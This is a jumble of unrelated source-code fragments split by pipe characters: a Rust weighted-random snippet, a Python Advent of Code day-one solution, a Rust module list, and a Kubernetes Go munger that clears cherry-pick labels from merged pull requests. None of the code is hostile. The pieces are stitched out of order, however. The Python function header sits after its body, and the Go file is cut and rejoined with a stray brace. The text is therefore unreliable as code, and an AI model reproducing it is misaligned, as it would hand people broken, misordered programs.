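// gives total_weight 14, so rolls 0..=9 map to "Goblin" and 10..=13 to "Orc".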
} | impl RandomEntry {
pub fn new<S: ToString>(name: S, weight: i32) -> RandomEntry { |
day01.py | def open_input():
with open("input.txt") as fd:
array = fd.read().splitlines()
array = list(map(int, array))
return array
| length = len(array)
increased = 0
for i in range(0, length - 1):
if array[i] < array[i + 1]:
increased += 1
print("part one:", increased)
def part_two(array):
length = len(array)
increased = 0
for i in range(0, length - 3):
sum1 = array[i] + array[i + 1] + array[i + 2]
sum2 = array[i + 1] + array[i + 2] + array[i + 3]
if sum1 < sum2:
increased += 1
print("part two:", increased)
if (__name__ == "__main__"):
array = open_input()
part_one(array)
part_two(array) |
def part_one(array): |
mod.rs | // Copyright (c) Microsoft Corporation.
// Licensed under the MIT License.
pub mod analysis;
pub mod config; | pub mod heartbeat;
pub mod merge;
pub mod report;
pub mod stats;
pub mod utils; | pub mod coverage;
pub mod fuzz;
pub mod generic; |
cherrypick-clear-after-merge.go | /*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package mungers
import (
"fmt"
"strings"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/test-infra/mungegithub/features"
"k8s.io/test-infra/mungegithub/github"
"k8s.io/test-infra/mungegithub/options"
"github.com/golang/glog"
)
const (
clearAfterMergeName = "cherrypick-clear-after-merge"
)
type LogFinder interface {
FoundLog(branch, logString string, regexSearch bool) (bool, string)
}
// ClearPickAfterMerge removes the cherrypick-candidate label from a merged PR
// once the corresponding commit is found on the milestone's release branch.
type ClearPickAfterMerge struct {
features *features.Features
logs LogFinder
}
func init() {
RegisterMungerOrDie(&ClearPickAfterMerge{})
}
// Name is the name usable in --pr-mungers
func (c *ClearPickAfterMerge) Name() string { return clearAfterMergeName }
// RequiredFeatures is a slice of 'features' that must be provided
func (c *ClearPickAfterMerge) RequiredFeatures() []string { return []string{features.RepoFeatureName} }
// Initialize will initialize the munger
func (c *ClearPickAfterMerge) Initialize(config *github.Config, features *features.Features) error {
c.features = features
c.logs = c
return nil
}
// EachLoop is called at the start of every munge loop
func (c *ClearPickAfterMerge) EachLoop() error { return nil }
// RegisterOptions registers options for this munger; returns any that require a restart when changed.
func (c *ClearPickAfterMerge) RegisterOptions(opts *options.Options) sets.String { return nil }
func handleFound(obj *github.MungeObject, branch string) error {
msg := fmt.Sprintf("Commit found in the %q branch appears to be this PR. Removing the %q label. If this is an error find help to get your PR picked.", branch, cpCandidateLabel)
obj.WriteComment(msg)
obj.RemoveLabel(cpCandidateLabel)
return nil
}
// FoundLog will return if the given `logString` exists on the branch in question.
// it will also return the actual logs for further processing
func (c *ClearPickAfterMerge) FoundLog(branch, logString string, regexSearch bool) (bool, string) {
args := []string{"merge-base", "origin/master", "origin/" + branch}
out, err := c.features.Repos.GitCommand(args)
base := string(out)
if err != nil {
glog.Errorf("Unable to find the fork point for branch %s. %s:%v", branch, base, err)
return false, ""
}
lines := strings.Split(base, "\n")
if len(lines) < 1 {
glog.Errorf("Found 0 lines splitting the results of git merge-base")
}
base = lines[0]
// if release-1.2 branched from master at abcdef123 this should result in:
// abcdef123..origin/release-1.2
logRefs := fmt.Sprintf("%s..origin/%s", base, branch)
var regexFlag string
if regexSearch {
regexFlag = "-E"
} else {
regexFlag = "-F"
}
args = []string{"log", "--pretty=tformat:%H%n%s%n%b", regexFlag, "--grep", logString, logRefs}
out, err = c.features.Repos.GitCommand(args)
logs := string(out)
if err != nil {
glog.Errorf("Error grepping logs out=%q: %v", logs, err)
return false, ""
}
glog.V(10).Infof("args:%v", args)
return true, logs
}
// Can we find a commit in the changelog that looks like it was done using git cherry-pick -m1 -x ?
func (c *ClearPickAfterMerge) foundByPickDashX(obj *github.MungeObject, branch string) bool {
sha, ok := obj.MergeCommit()
if !ok {
return false
}
if sha == nil {
glog.Errorf("Unable to get SHA of merged PR %d", *obj.Issue.Number)
return false
}
cherrypickMsg := fmt.Sprintf("(cherry picked from commit %s)", *sha)
found, logs := c.logs.FoundLog(branch, cherrypickMsg, false)
if !found {
return false
}
// double check for the 'non -x' message
logMsg := fmt.Sprintf("Merge pull request #%d from ", *obj.Issue.Number)
if !strings.Contains(logs, logMsg) {
return false | glog.Infof("Found cherry-pick for %d using -x information in branch %q", *obj.Issue.Number, branch)
return true
}
// Can we find a commit in the changelog that looks like it was done using git cherry-pick -m1 ?
func (c *ClearPickAfterMerge) foundByPickWithoutDashX(obj *github.MungeObject, branch string) bool {
logMsg := fmt.Sprintf("Merge pull request #%d from ", *obj.Issue.Number)
found, _ := c.logs.FoundLog(branch, logMsg, false)
if found {
glog.Infof("Found cherry-pick for %d using log matching for `git cherry-pick` in branch %q", *obj.Issue.Number, branch)
}
return found
}
// Check that the commit messages for all commits in the PR are on the branch
func (c *ClearPickAfterMerge) foundByAllCommits(obj *github.MungeObject, branch string) bool {
commits, ok := obj.GetCommits()
if !ok {
glog.Infof("unable to get commits")
return false
}
for _, commit := range commits {
if commit.Commit == nil {
return false
}
if commit.Commit.Message == nil {
return false
}
found, _ := c.logs.FoundLog(branch, *commit.Commit.Message, false)
if !found {
return false
}
}
return true
}
// Can we find a commit in the changelog that looks like it was done using the hack/cherry_pick_pull.sh script ?
func (c *ClearPickAfterMerge) foundByScript(obj *github.MungeObject, branch string) bool {
logMsg := fmt.Sprintf(`^Automated cherry pick of( #[0-9]+)* #%d( #[0-9]+)*$`, *obj.Issue.Number)
found, _ := c.logs.FoundLog(branch, logMsg, true)
if found {
glog.Infof("Found cherry-pick for %d using log matching for `hack/cherry_pick_pull.sh` in branch %q", *obj.Issue.Number, branch)
}
return found
}
// Munge is the workhorse the will actually make updates to the PR
func (c *ClearPickAfterMerge) Munge(obj *github.MungeObject) {
if !obj.IsPR() {
return
}
if !obj.HasLabel(cpCandidateLabel) {
return
}
if merged, ok := obj.IsMerged(); !ok || !merged {
return
}
releaseMilestone, ok := obj.ReleaseMilestone()
if !ok || releaseMilestone == "" || len(releaseMilestone) != 4 {
glog.Errorf("Found invalid milestone: %q", releaseMilestone)
return
}
rel := releaseMilestone[1:]
branch := "release-" + rel
if c.foundByPickDashX(obj, branch) {
handleFound(obj, branch)
return
}
if c.foundByAllCommits(obj, branch) {
handleFound(obj, branch)
return
}
if c.foundByPickWithoutDashX(obj, branch) {
handleFound(obj, branch)
return
}
if c.foundByScript(obj, branch) {
handleFound(obj, branch)
return
}
return
} | } |